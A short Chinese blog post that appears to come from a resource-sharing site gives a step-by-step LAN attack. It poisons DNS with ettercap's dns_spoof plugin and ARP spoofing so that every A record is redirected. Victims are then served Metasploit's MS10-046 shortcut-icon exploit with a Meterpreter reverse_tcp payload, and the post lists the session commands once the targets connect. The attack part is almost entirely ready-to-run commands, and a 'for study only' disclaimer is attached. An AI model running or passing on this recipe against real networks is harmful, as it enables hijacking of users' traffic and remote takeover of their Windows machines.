内网攻防:Metasploit劫持。

摘要

黑客入侵内网,成功劫持DNS,轻松拿到cmdshell。他狂喜地使用ifconfig获取了IP和网卡信息,然后打开了etter.dns文件,插入了*A记录预设IP。最后,他启动了本机的apache服务,一切准备就绪,等待下一步行动。

正文

【摘要】内网渗透劫持DNS拿到cmdshellifconfig//获取IP及网卡信息leafpad/etc/ettercap/etter.dns//打开文件插入*A记录预设IPserviceapache2start//启动本机apache服务此次不…

内网渗透劫持DNS拿到cmdshell

ifconfig //获取IP及网卡信息leafpad /etc/ettercap/etter.dns //打开文件 插入* A 记录 预设IPservice apache2 start //启动本机apache服务 此次不用启动,使用ms10_046会自动启动//* A ip 劫持所有A记录//*.com A ip 劫持msfconsole //启动msfsearch ms10_046 //搜索ms10_046use exploit/Windows/browser/ms10_046_shortcut_icon_dllloader //设置模块set payload windows/meterpreter/reverse_tcpset lhost ifconfig的ip(本机ip或预设IP) //监听set servhost ifconfig的ip(本机ip或预设IP)exploit //执行ettercap -T -q -i eth0 -P dns_spoof -M arp /// /// //劫持 -i 网卡 -P 插件 ///分别代表 任意IP 任意地址此时同意网段内用户访问网站时会 劫持 并与本机建立会话目标机器上线后 jobs sessions -lsession -i 1

关注不迷路

扫码下方二维码,关注宇凡盒子公众号,免费获取最新技术内幕!

温馨提示:如果您访问和下载本站资源,表示您已同意只将下载文件用于研究、学习而非其他用途。
文章版权声明 1、本网站名称:宇凡盒子
2、本站文章未经许可,禁止转载!
3、如果文章内容介绍中无特别注明,本网站压缩包解压需要密码统一是:yufanbox.com
4、本站仅供资源信息交流学习,不保证资源的可用及完整性,不提供安装使用及技术服务。点此了解
5、如果您发现本站分享的资源侵犯了您的权益,请及时通知我们,我们会在接到通知后及时处理!提交入口
0

评论0

请先

站点公告

🚀 【宇凡盒子】全网资源库转储中心

👉 注册即送VIP权限👈

👻 全站资源免费下载✅,欢迎注册!

记得 【收藏】+【关注】 谢谢!~~~

立即注册
没有账号?注册  忘记密码?

社交账号快速登录